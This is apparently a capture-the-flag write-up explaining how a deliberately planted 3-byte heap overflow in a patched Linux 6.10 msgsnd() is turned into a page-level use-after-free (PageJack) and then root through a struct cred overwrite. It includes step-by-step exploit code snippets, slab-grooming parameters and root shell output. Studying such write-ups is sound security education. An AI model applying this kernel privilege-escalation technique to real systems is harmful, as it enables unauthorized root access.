TL;DR
A 3-byte heap OOB write in msgsnd() is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack).
Description: i love sending messages, so i made it possible to add just a few more bytes to them
Vulnerability
A custom Linux 6.10.9 kernel ships with the following patch in ipc/msgutil.c:
@@ -93,7 +93,7 @@
return ERR_PTR(-ENOMEM);
alen = min(len, DATALEN_MSG);
- if (copy_from_user(msg + 1, src, alen))
+ if (copy_from_user(msg + 1, src, alen + 3))
goto out_err;
load_msg(), invoked by msgsnd(), copies alen + 3 bytes from userland into a freshly-allocated msg_msg slab object. Three bytes are written past the end of the slot, into the next object in the same slab. The allocation size (via msgsz) and the three overflow bytes (bytes [msgsz, msgsz+1, msgsz+2] of the user buffer) are both attacker-controlled.
Relevant kernel configuration:
CONFIG_RANDSTRUCT_NONE=y(no field reordering on kernel structs)HARDENED_USERCOPY,INIT_ON_ALLOC,INIT_ON_FREE,RANDOM_KMALLOC_CACHESare disabled- KASLR / SMAP / SMEP / KPTI are enabled but irrelevant (the exploit requires no infoleak)
Object collision in kmalloc-cg-1k
struct msg_msg has a 48-byte header followed by the payload:
struct msg_msg {
struct list_head m_list; // 16 B
long m_type; // 8 B
size_t m_ts; // 8 B
struct msg_msgseg *next; // 8 B
void *security; // 8 B
/* payload */
};
msgsnd() allocates kmalloc(48 + msgsz, GFP_KERNEL_ACCOUNT). The _ACCOUNT flag routes the allocation into the kmalloc-cg-* accounted caches.
A pipe is backed by a ring of 16 pipe_buffer structs allocated as a single array:
struct pipe_buffer {
struct page *page; // offset 0
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
}; // sizeof = 40 B
The ring is 16 * 40 = 640 bytes, allocated via kcalloc(..., GFP_KERNEL_ACCOUNT). Both pipe_buffer[16] (640 → 1024) and msg_msg with msgsz = 974 (48 + 974 = 1022 → 1024) land in kmalloc-cg-1k. Choosing msgsz = 974 places the overflowing msg_msg next to a pipe_buffer[16] and the 3-byte overflow lands on the first field of that array, pipe_buffer[0].page.
PageJack primitive
The kernel maintains a struct page descriptor for every physical page, in a flat array (the vmemmap) located around 0xffffea0000000000 on x86_64:
PFN N → vmemmap[N] @ 0xffffea0000000000 + N * 0x40
Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Overwriting that low byte with 0x40 yields:
| original LSB | net shift | target |
|---|---|---|
0x00 |
+0x40 | PFN + 1 |
0x40 |
0 | no-op |
0x80 |
-0x40 | PFN - 1 |
0xC0 |
-0x80 | PFN - 2 |
In three cases out of four, pipe_buffer.page is shifted to a different struct page, which describes a different physical page. No PTE is involved; the corruption is purely in the kernel pointer that is later dereferenced for pipe I/O.
Pipe append semantics and the marker design
When write() is called on a pipe whose last buffer has PIPE_BUF_FLAG_CAN_MERGE set and len > 0, the kernel appends data at page + buf->offset + buf->len and increments len. The destination offset on the page is fully determined by the buffer’s offset and len fields.
Reading from a pipe consumes data and invokes pipe_buf_release (which calls put_page) only when the buffer becomes empty. A read that leaves len > 0 advances offset but does not release the buffer.
The exploit uses an 8-byte marker per pipe: two consecutive 4-byte writes that merge into a single pipe_buffer[0] with offset=0, len=8. The detection scan then reads 4 bytes per pipe, leaving each touched buffer at (offset=4, len=4). Two consequences:
pipe_buf_releaseis never called during the scan, so the underlying page is not freed prematurely.- After the scan,
offset + len == 8regardless of read order. The final write, which appends at that location, will land at offset 8 of the page.
Offset 8 on a cred_jar page is the offset of cred.uid.
cred_jar and the buddy allocator
struct cred is allocated from a dedicated slab cache (cred_jar). Slab caches are isolated at the slab layer, but they all pull backing pages from the same buddy allocator. A page returned to buddy by kmalloc-cg-1k can be reissued to cred_jar on its next refill.
The relevant fields of struct cred on Linux 6.10 (include/linux/cred.h):
0..8 atomic_long_t usage <- refcount
8..12 kuid_t uid
12..16 kgid_t gid
16..20 kuid_t suid
20..24 kgid_t sgid
24..28 kuid_t euid
28..32 kgid_t egid
32..36 kuid_t fsuid
36..40 kgid_t fsgid
Zeroing bytes 8..36 sets uid through fsuid to 0 while leaving usage intact. With cred_jar slot size of 192 B, a single 4 KiB page hosts ~21 cred slots.
Draining cred_jar
To force cred_jar to refill from buddy, the freelist must be emptied. A setuid() loop is the standard mechanism: each call invokes
new = prepare_creds(); // ALLOCATES a fresh cred from cred_jar
new->uid = ...;
commit_creds(new); // current->cred = new; OLD cred returns via RCU
Allocations are immediate; the freeing of the previous cred is RCU-deferred. In a tight loop, the freelist drains faster than RCU returns, and once empty the next prepare_creds() triggers a buddy request. On this kernel, ~128 iterations is sufficient. A larger drain is counter-productive: the longer the UAF page sits in buddy, the higher the chance another allocator consumes it first.
Exploitation
Setup: pin the process to a single CPU (stabilizes per-CPU slab partial lists) and raise RLIMIT_NOFILE (each pipe consumes two FDs).
Step 1: spray pipes
for (int i = 0; i < 384; i++) pipe(pipes[i]);
Each pipe() allocates a pipe_buffer[16] array into kmalloc-cg-1k.
Step 2: write markers
for (int i = 0; i < 384; i++) {
write(pipes[i][1], &i, 4);
write(pipes[i][1], &i, 4);
}
The second write merges with the first via CAN_MERGE; the buffer ends at offset=0, len=8 with the marker [i, i] written to its page.
Step 3: free 22 holes
free_special_pipes(48, 304); // close i where i % 12 == 0
22 multiples of 12 in [48, 304], each surrounded by surviving pipes. A more aggressive step (e.g. 1-in-2) would allow two adjacent slots to both be reclaimed by msg_msgs, causing the overflow to clobber another msg_msg rather than a pipe_buffer.
Step 4: trigger the overflow
m.mtype = 1;
memset(m.mtext, 0x41, 974);
m.mtext[976] = 0x40;
for (int q = 0; q < 24; q++) msgsnd(qids[q], &m, 974, 0);
msgsz = 974 → kmalloc(1022) → 1024-byte slot. copy_from_user writes 977 bytes starting at slot offset 48; mtext[974] and mtext[975] fall into the slot’s tail padding (object 1022 B, slot 1024 B); only mtext[976] reaches byte 0 of the neighboring slot, the LSB of pipe_buffer[0].page.

Step 5: locate the overlap
for (int i = 0; i < 384; i++) {
int val;
if (read(pipes[i][0], &val, 4) != 4) continue;
if (val != i && val >= 0 && val < 384 && pipes[val][0] != -1) {
a = i; // corrupted pipe
b = val; // page's legitimate owner
break;
}
}
A pipe whose first 4 bytes do not match its index has had bufs[0].page shifted to another pipe’s page; the read returns that other pipe’s marker. Each read consumes 4 of 8 bytes, so the page is not released. pipes[a] and pipes[b] both reference the shared page on exit.
![Figure 2: pipe[a] and pipe[b] both reference the same struct page](/images/messenger/figure_2_overlap.png)
Step 6: free the shared page
close(pipes[a][0]); close(pipes[a][1]);
pipe_release calls put_page on the shifted pointer. The refcount goes 1 → 0, the page returns to buddy. pipes[b] still holds a stale .page pointing at it: page-level UAF.
![Figure 3: close(pipe[a]) returns the shared page to buddy](/images/messenger/figure_3_uaf.png)
Step 7: drain cred_jar and fork
for (int i = 0; i < 128; i++) setuid(1000);
if (fork() == 0) fork_n_win(320);
After 128 setuid() calls, cred_jar requests a page from buddy on the next prepare_creds(). The 320 subsequent fork() calls each allocate a cred via copy_creds(); with ~21 slots per page, several land in the hijacked page.
Step 8: overwrite cred IDs
static char zeros[4096] = {0};
write(pipes[b][1], zeros, 0x18 + 4); // 28 bytes
pipe_write appends to pipes[b].bufs[0] at page + offset + len. Two cases:
- if
b > a:pipes[b]was not read during the scan; buffer is at(0, 8). - if
b < a:pipes[b]was read once during the scan; buffer is at(4, 4).
offset + len == 8 in both cases. The 28 zero bytes cover page offsets 8..36, i.e. uid + gid + suid + sgid + euid + egid + fsuid of the first cred slot on the page. usage (0..8) is preserved.
![Figure 4: cred_jar reclaims the page; write through pipe[b] zeroes uid..fsuid](/images/messenger/figure_4_overwrite.png)
Step 9: trigger the shell
Each forked child polls getuid() and execs /bin/sh once it reads 0. The parent must not exit; closing pipes[b] would call put_page on a cred_jar page and oops the kernel.
[+] uid=0 gid=0 euid=0 egid=0 pid=239
lactf{not_the_real_thing}
Tuning rationale
| Parameter | Value | Reason |
|---|---|---|
msgsz |
974 | 48 + 974 = 1022 rounds to 1024, landing in kmalloc-cg-1k. A larger payload moves to kmalloc-cg-2k and misses every pipe_buffer. |
| OOB byte | 0x40 |
Maintains 0x40 alignment of struct page *. Any other value yields an unaligned pointer that faults on dereference. |
| Free step | 12 | Ensures each freed slot is bordered by surviving pipes, so every overflow hits a pipe_buffer. |
| Marker layout | 2×4 B write, 4 B read | Keeps the buffer alive after the scan and places the next write at page offset 8 regardless of (a, b) ordering. |
| Drain | 128 | Empties cred_jar’s freelist without leaving the UAF page exposed to other allocators for an extended period. |
Closing pipes[b] |
never | Releasing it would call put_page on a page now owned by cred_jar. |
References
- Original writeup by Shunt (idek team): https://idek.team/blog/oob-write-to-page-uaf-lactf-2025/
- PageJack, Black Hat USA 2024 by Qian: https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
- Reviving exploits against cred_struct, by willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
- CVE-2022-0995 (pipe_buffer.page bit set): similar technique with watch_queue